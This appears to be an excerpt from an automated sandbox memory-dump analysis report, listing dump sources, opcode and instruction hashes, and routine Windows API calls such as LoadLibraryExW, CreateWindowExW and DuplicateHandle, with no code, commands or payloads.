                                                                                                                                          • Instruction ID: 7ebe9d86368e04059e293c4f7daec8563aad9722755fcdb3777d4eb01ce569d5
                                                                                                                                          • Opcode Fuzzy Hash: d5478ce19325892d1b5b83a654165dca63edfa68e953fc855b7adb3202740638
                                                                                                                                          • Instruction Fuzzy Hash: F9F14FB4A20209DFDB08DFB5D854AADBBB2FF88304F158469E4069B355DB35EC46CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4d9d82441a1088484e9753441a68c4c7082202ac5a6393ecb08ae17dde6c3492
                                                                                                                                          • Instruction ID: ccb58d8f57487ba1a5fad857f9dc0bee231c7f5d4603b22733f8bb7b5b63d2ed
                                                                                                                                          • Opcode Fuzzy Hash: 4d9d82441a1088484e9753441a68c4c7082202ac5a6393ecb08ae17dde6c3492
                                                                                                                                          • Instruction Fuzzy Hash: 650259F5A20706CFDB25CF69D494A6ABBF2FF48300F188969E4469B761CB34E845CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e2846430abc334e2f670657e5bd2955e394fffcc31401047c3e0a9f5df5b3cec
                                                                                                                                          • Instruction ID: f48fe8bce511a4fbf4991734026d03c22ba01d4afdd58b90e6218756dcfdbfbc
                                                                                                                                          • Opcode Fuzzy Hash: e2846430abc334e2f670657e5bd2955e394fffcc31401047c3e0a9f5df5b3cec
                                                                                                                                          • Instruction Fuzzy Hash: 73020AB4A002298FCB64DF68D988A99B7F2FF88300F1584D9D9599B751DB34EE81CF50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014DB6B0
                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 014DB6ED
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014DB72A
                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 014DB783
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                          • Opcode ID: d2f2d061b61874abf3d81c30de5b27cdc71861acee1690be93cf4d1f0fe6e235
                                                                                                                                          • Instruction ID: ee96edf682d43a78c773b4d1d4bf1cfabbe902de25b63052a3bc24e29bdd9cd1
                                                                                                                                          • Opcode Fuzzy Hash: d2f2d061b61874abf3d81c30de5b27cdc71861acee1690be93cf4d1f0fe6e235
                                                                                                                                          • Instruction Fuzzy Hash: 315144B49006498FEB04CFAAD588BDEBFF1EF49304F25845AE019A7360DB745944CF66
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014DB6B0
                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 014DB6ED
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014DB72A
                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 014DB783
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                          • Opcode ID: 0edead29c422bfd29b7f18851ca9236f964eeb1af457d856d0ea8ea4d04c4916
                                                                                                                                          • Instruction ID: 544c17714122ba80ccc2c5b8e41f11d9063d2d174582f1a1e961df50ac1274a4
                                                                                                                                          • Opcode Fuzzy Hash: 0edead29c422bfd29b7f18851ca9236f964eeb1af457d856d0ea8ea4d04c4916
                                                                                                                                          • Instruction Fuzzy Hash: D75155B09006498FEB14CFAAD548BDEBFF1EF89304F25845AE019A7360DB745944CF66
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fac35094b3fe074f57f9a0fe0f51bb4cce2ff4d98461db5eaf056a2fece092e5
                                                                                                                                          • Instruction ID: 73c70888e5cda8ac3f8ac8283ce656a1654b66f1f8ec9db4681544fa658f2988
                                                                                                                                          • Opcode Fuzzy Hash: fac35094b3fe074f57f9a0fe0f51bb4cce2ff4d98461db5eaf056a2fece092e5
                                                                                                                                          • Instruction Fuzzy Hash: 4D6350B0F41228AFEB259B90CC55BDEB7B6EB88704F104499E7096B3D0CB755E80AF15
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 014D9896
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 794f598735b53ef496e6d86191189a6844ddbc813c40a4bf068f30d0f0d87515
• Instruction ID: b182bd98b7ada0ad75f3f65b8b924d35a873d42abbe3eaae8a9b5cbfcd05736c
• Opcode Fuzzy Hash: 794f598735b53ef496e6d86191189a6844ddbc813c40a4bf068f30d0f0d87515
• Instruction Fuzzy Hash: 898136B0A00B058FDB64DF6AD55179BBBF1BF88208F00892ED58AD7B50D735E845CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014DFDCA
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 43172b90e668ac7a8339fe8da367928fe9e39e2cde741342a1fb053b0552e933
• Instruction ID: 206094f4672dd22663d4d7b5fcd6bfd3fcf94b5d907b1dbbd963e63da93dc852
• Opcode Fuzzy Hash: 43172b90e668ac7a8339fe8da367928fe9e39e2cde741342a1fb053b0552e933
• Instruction Fuzzy Hash: 2B51CFB1D002099FDF14CFAAC890ADEBBF5BF48314F24852AE819AB210D7749946CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014DFDCA
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: a1211ed0104f2e1a07f0e87dfb8b0695a7192a8cf9d465727c22d8cbbcf88af7
• Instruction ID: c23973bb1c7d192782aca73853214aa2e8a40841bef7f5a433c8133b51cd6737
• Opcode Fuzzy Hash: a1211ed0104f2e1a07f0e87dfb8b0695a7192a8cf9d465727c22d8cbbcf88af7
• Instruction Fuzzy Hash: BB41AFB1D003099FDF14CF9AD894ADEBBF5BF88314F24852AE819AB210D7749946CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateActCtxA.KERNEL32(?), ref: 014D5401
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: f0d846bb86e341679b35a0628097442375393e082575464a76e25bd8bfbc8a27
• Instruction ID: ab3b270cd4fdcbb81b30d5c71fefc740b95d946c05ca1d4a3029fa22b3b4f123
• Opcode Fuzzy Hash: f0d846bb86e341679b35a0628097442375393e082575464a76e25bd8bfbc8a27
• Instruction Fuzzy Hash: 8841F2B1D00619CFDF24CFA9C884BCEBBB5BF49304F24846AD408AB251DB74694ACF91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateActCtxA.KERNEL32(?), ref: 014D5401
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: a806e188d65974e79a690f5dd421143127738dabc38bd812f933e1fdcd453cd3
• Instruction ID: 7208c94018d4445dc4ac144285471b65b0d12e15380431d00978fc6c89885cca
• Opcode Fuzzy Hash: a806e188d65974e79a690f5dd421143127738dabc38bd812f933e1fdcd453cd3
• Instruction Fuzzy Hash: 57410270D10618CFDF24CFAAC884BDEBBB5BF48304F24846AD408AB251DBB56946CF91
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DB8FF
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 449a238ebf4d072dd800299d022116ac058042a794cbbc423a623d7b88e48512
• Instruction ID: 96e68aa12cc9a0288ddc5f6acb26d2e3306fff0fe1fcfe84cd23f1a6861e1ee2
• Opcode Fuzzy Hash: 449a238ebf4d072dd800299d022116ac058042a794cbbc423a623d7b88e48512
• Instruction Fuzzy Hash: EF21D3B5D002499FDB10CFAAD884ADEFBF8FB49324F15841AE914A7350D378A954CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DB8FF
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: fa93c817270f3e68d8b0f6c3cac57dcdb9d33c0cb450c62497994e5ca5d18f77
• Instruction ID: fcfc435823dd4ec4d6fe2befab06ff08e7d34ed9552a12b0e190abac0ac06c38
• Opcode Fuzzy Hash: fa93c817270f3e68d8b0f6c3cac57dcdb9d33c0cb450c62497994e5ca5d18f77
• Instruction Fuzzy Hash: FA21E2B5901249DFDB00CFA9D984ADEBFF4FB48324F15845AE914A3350D378A954CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9911,00000800,00000000,00000000), ref: 014D9B22
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 26af0014bd52043f4da8b78f6fb8c1cf34a994704a352ceb82b0a11428168157
• Instruction ID: 61269694359647a8f3c87dd4f998cd342fcc7fa7c432ea521879562288cc2fd6
• Opcode Fuzzy Hash: 26af0014bd52043f4da8b78f6fb8c1cf34a994704a352ceb82b0a11428168157
• Instruction Fuzzy Hash: CF1103B69002499FDF10CF9AC444ADEFBF4EB88314F05842AE915A7310C374A945CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9911,00000800,00000000,00000000), ref: 014D9B22
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 9803d78a5655e366d419e4e5844a28c4a96ad3e209e4e18b1a9061f83b5cbb69
• Instruction ID: 7d123002c02cff285cd645b807beb26b3f80242fac0df79520e6cfe8766ea038
• Opcode Fuzzy Hash: 9803d78a5655e366d419e4e5844a28c4a96ad3e209e4e18b1a9061f83b5cbb69
• Instruction Fuzzy Hash: 881100B69002098FDB10CFAAD844BDEFBF4BB98314F05852AD559A7210C379A545CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 014D9896
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 0347b2da04fdedcddbae2c10c7642293804637d5d6f8e12fb553f5f6a3cc514f
• Instruction ID: 28e56bd0674f32f8906a3a63ad3c636b5ca5c04bcfe55155bb557cd82284c058
• Opcode Fuzzy Hash: 0347b2da04fdedcddbae2c10c7642293804637d5d6f8e12fb553f5f6a3cc514f
• Instruction Fuzzy Hash: DC110FB5C006098FDB10CF9AC844BDEFBF4EF89624F10842AD429A7210D378A545CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowLongW.USER32(?,?,?), ref: 014DFF5D
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: ec843c1d6db928c3109e20e81043d053c4f0f13f18114b32ec83d2ae0149e93d
• Instruction ID: ddc4a86aeab041c400da697cb635b1291644e5c427a3a48c5de61e048efcbd67
• Opcode Fuzzy Hash: ec843c1d6db928c3109e20e81043d053c4f0f13f18114b32ec83d2ae0149e93d
• Instruction Fuzzy Hash: B11115B58002099FDB10CF9AD484BDFFBF8EB88324F10845AE919A7340C374A944CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowLongW.USER32(?,?,?), ref: 014DFF5D
Memory Dump Source
• Source File: 00000000.00000002.217947173.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: c2d7e59a83c3960686e91bc5bcdc5c57d96fee944083091fbb817d809fca6193
• Instruction ID: da8758bdcc282f0b516b96c1cf8b31df7768fc187244037a255b51e0f50bc056
• Opcode Fuzzy Hash: c2d7e59a83c3960686e91bc5bcdc5c57d96fee944083091fbb817d809fca6193
• Instruction Fuzzy Hash: 601133B58003488FDB10CF99D485BDEFBF4EB89320F10845AD959A3340C378A945CFA1
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
Similarity
• API ID:
• String ID: +b
• API String ID: 0-838691201
• Opcode ID: 62e8527678e7dc3d6511a1516ad0490d915dabfb9e21ab668cd255104efaa58e
• Instruction ID: cfe54146b595013434f043799d035840c6dc7baac17a8bdb3ac7c5221c701dc7
• Opcode Fuzzy Hash: 62e8527678e7dc3d6511a1516ad0490d915dabfb9e21ab668cd255104efaa58e
• Instruction Fuzzy Hash: 32618DB0B00205CFDB24DF68D599AAEBBF5EF88304F148469E50ADB761DB74AC41CB91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 9e0d1bc7a2c66b6f99c2eb52785d9fd63d086abdb6790f503a4ef3fc169ec4d4
• Instruction ID: df8fa1194ac20d35e1438179ba944d50ddc1f923f9a19ac0c2a64a3fd10d18fc
• Opcode Fuzzy Hash: 9e0d1bc7a2c66b6f99c2eb52785d9fd63d086abdb6790f503a4ef3fc169ec4d4
• Instruction Fuzzy Hash: 20516BB6E1021A9FDF14CF68C885AAEBBF1FF48310F098069E915AB251D734DA55CB90
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: "
                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                          • Opcode ID: 183b08343d5b9a194d54d4238ae94a29f08d4021b9564a74f27c315419df8e1b
                                                                                                                                          • Instruction ID: e465befbcd2b09f6025deb16765ebaed108ac0cb031539bfc21fdda7427df030
                                                                                                                                          • Opcode Fuzzy Hash: 183b08343d5b9a194d54d4238ae94a29f08d4021b9564a74f27c315419df8e1b
                                                                                                                                          • Instruction Fuzzy Hash: 77012B71A10109ABEB20EFA9EC415EFFBF9EFC4314F048925D1589B650D774AE098BE1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $
                                                                                                                                          • API String ID: 0-3993045852
                                                                                                                                          • Opcode ID: b48b82fae42887242d70b628d10aca48722779b7a16bcd2e4c1a5dad4dea94e3
                                                                                                                                          • Instruction ID: d03a44278a5da51e1a782c18d8b751d0738a4ca57df8b6bd9033c5f89f1c80ac
                                                                                                                                          • Opcode Fuzzy Hash: b48b82fae42887242d70b628d10aca48722779b7a16bcd2e4c1a5dad4dea94e3
                                                                                                                                          • Instruction Fuzzy Hash: 4001DB71A101099BDF20DF59D8405EFFBF9FF84214F048929D5549B650D770AE0887E1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 41552a75537b34c1ba052e75692ebcfc0b6e9786f6c65ae647c32cec79766ed9
                                                                                                                                          • Instruction ID: cf7d02962782af820641d3ee02244955aa1e56ea58908a8c064d31a8b446d7ab
                                                                                                                                          • Opcode Fuzzy Hash: 41552a75537b34c1ba052e75692ebcfc0b6e9786f6c65ae647c32cec79766ed9
                                                                                                                                          • Instruction Fuzzy Hash: C6E19DB43101168FDB64DF3DC5A4A6A73F6AF8960831580A9EA0ACBB75EF70DC01CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b6bb0bea64a9a134425d00ef2b147a936d842187a346e33321ee2e8eb2b852f4
                                                                                                                                          • Instruction ID: b62063160c45690972646defdc0dbd516278edc8aa2dc4d3ffdbe88a460adc4a
                                                                                                                                          • Opcode Fuzzy Hash: b6bb0bea64a9a134425d00ef2b147a936d842187a346e33321ee2e8eb2b852f4
                                                                                                                                          • Instruction Fuzzy Hash: 00F15CB5720606CFCB54CF69C489AAABBE2FF85224F198469E546CB761CB34EC40CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dec41eb1ad30311c5411a78086404e533a33db14dab986985dd81079c427a632
                                                                                                                                          • Instruction ID: c7fec9b878a0f1e308afb3b018dabf302b0efee6d3745e17d2f547f2cc51c749
                                                                                                                                          • Opcode Fuzzy Hash: dec41eb1ad30311c5411a78086404e533a33db14dab986985dd81079c427a632
                                                                                                                                          • Instruction Fuzzy Hash: FBB1ABB47242828FCB60EF79C464A2BB7F6AF44600F09493AD456C7390DB74EC42CB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 398b513c9c3c9b1b470e98af63fa584834223c593447e887fd1e1b7b003acd92
                                                                                                                                          • Instruction ID: 34c04f722649599238fc3e1f9be5e3244cbc09e598f4c59e46019e19d87b88ce
                                                                                                                                          • Opcode Fuzzy Hash: 398b513c9c3c9b1b470e98af63fa584834223c593447e887fd1e1b7b003acd92
                                                                                                                                          • Instruction Fuzzy Hash: E1B18DB07252429FDB159F28C094A66BBF2EF85214F1DC4AAE44ACB762CB30EC41CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 59e569872c3e778cdfcebd4dcf0e2eccb7a9da9d8484cf8e53db925d00239432
                                                                                                                                          • Instruction ID: ecd2f4e68972f92ef1bacfdd9ee3d42f11f022729107cdb7bca0989936498a5b
                                                                                                                                          • Opcode Fuzzy Hash: 59e569872c3e778cdfcebd4dcf0e2eccb7a9da9d8484cf8e53db925d00239432
                                                                                                                                          • Instruction Fuzzy Hash: 728180F0B35226DBCF251A64884473ABAAA9FC5B64F0C443EE8868B244DB75DCC1C7D1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 547a32b15617bc75cbb60d9f08aa7d1cb2eeb92adcb25d9c5e6507fbdaff51a7
                                                                                                                                          • Instruction ID: 008dc055166a49336342902ef528cc8b1d36596ee94704ee3cfa5e363b7a87c7
                                                                                                                                          • Opcode Fuzzy Hash: 547a32b15617bc75cbb60d9f08aa7d1cb2eeb92adcb25d9c5e6507fbdaff51a7
                                                                                                                                          • Instruction Fuzzy Hash: ECA17EB0B1021A9FCB14DFA4DA9499EB7F2EF89304B158429D916DB364DF70ED02CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3b16b6c1cdf8059af6685badc56472da828c65752a1f5eccd8e7c75164fd438d
                                                                                                                                          • Instruction ID: 4c07a83a6fed28bae0dcd36fcd34caaa8513da9928358f6848609f8ab15ed387
                                                                                                                                          • Opcode Fuzzy Hash: 3b16b6c1cdf8059af6685badc56472da828c65752a1f5eccd8e7c75164fd438d
                                                                                                                                          • Instruction Fuzzy Hash: 409147B0B102059FDF58DF65D884AAEBBB2FF88310F188069E9069B395DB35DD41CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b83f304862d6ca2cbb5b4b705eb57cae86daf171240c418811261cc461b9249e
                                                                                                                                          • Instruction ID: 9b0c8f64996e95504f8da824e2959b837fd695688fcbc522ed1548027e9ba983
                                                                                                                                          • Opcode Fuzzy Hash: b83f304862d6ca2cbb5b4b705eb57cae86daf171240c418811261cc461b9249e
                                                                                                                                          • Instruction Fuzzy Hash: 0581CEB2A00255DFDB12CF74D880ADEBBF2FF89310B28856AD545CB751CB34A851CB92
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c407c7ecef2a435857a8489d680c06af32c7af6f2a55ab51554f9308e908e232
                                                                                                                                          • Instruction ID: 113cbe3c312c1452d6799b0f5551cc32e0312da4790f56f2b7c265de6fd54067
                                                                                                                                          • Opcode Fuzzy Hash: c407c7ecef2a435857a8489d680c06af32c7af6f2a55ab51554f9308e908e232
                                                                                                                                          • Instruction Fuzzy Hash: 4A71F3B57002059FCB14DF39D9849AABBF2EF88214B19847AD506DB762DF30EC05CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cc6d68d2c11ffffcd6fa639cd14dc8c2c7dfa18e8b9702bb991f55792bc8521a
                                                                                                                                          • Instruction ID: 31cb3fe497a3af27845731e7176642afc4c63470382d3677dbe65fb4405723b7
                                                                                                                                          • Opcode Fuzzy Hash: cc6d68d2c11ffffcd6fa639cd14dc8c2c7dfa18e8b9702bb991f55792bc8521a
                                                                                                                                          • Instruction Fuzzy Hash: 40717CB6A0020AAFCB01DFA9D845AEEFBF5FF88310F14816AE515D7311D734A945CBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 89130b12f395b028761b5fb70ba6179339168db878fbd67ecc8a5439084900a9
                                                                                                                                          • Instruction ID: 092a8a0a830df3fa14633cc96fa5f33fe764b35911044dc7cbe32b2bc442fc1c
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e553f5dcad93923ee63800982c5f9d6cace42791342cda050ba762a8c9190977
                                                                                                                                          • Instruction ID: 497c9d4c938e4b29877a9b368143b9aeaf0738b06c95550d8f0c4edf4ed5cea3
                                                                                                                                          • Opcode Fuzzy Hash: e553f5dcad93923ee63800982c5f9d6cace42791342cda050ba762a8c9190977
                                                                                                                                          • Instruction Fuzzy Hash: 04418EF1628B429FDB70CB35C094762BBE0BB05214F08997ED48683A91D774E8C4C772
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84b79f6ec825fc4b1bf387595e6a4bf10077a2e806befdc02b74fe692b7950f8
                                                                                                                                          • Instruction ID: 6cfce8ea7c7eabc1f1a7813ae6afee86b372d310836fa996045f8b56bb0c5108
                                                                                                                                          • Opcode Fuzzy Hash: 84b79f6ec825fc4b1bf387595e6a4bf10077a2e806befdc02b74fe692b7950f8
                                                                                                                                          • Instruction Fuzzy Hash: C741D87571064B9FCF15DA6ED8409AEB7B5EFC9210B1A80BAD905CB351EB30EC11C7A1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f5e02eaa9efd3a7abe0a72f2b79f864d87953dfdd9a9687284600de498e55a6f
                                                                                                                                          • Instruction ID: 99219af3a27f29caeeb40d9e0652565b3f4353ea973b76e2440ca7b749237a16
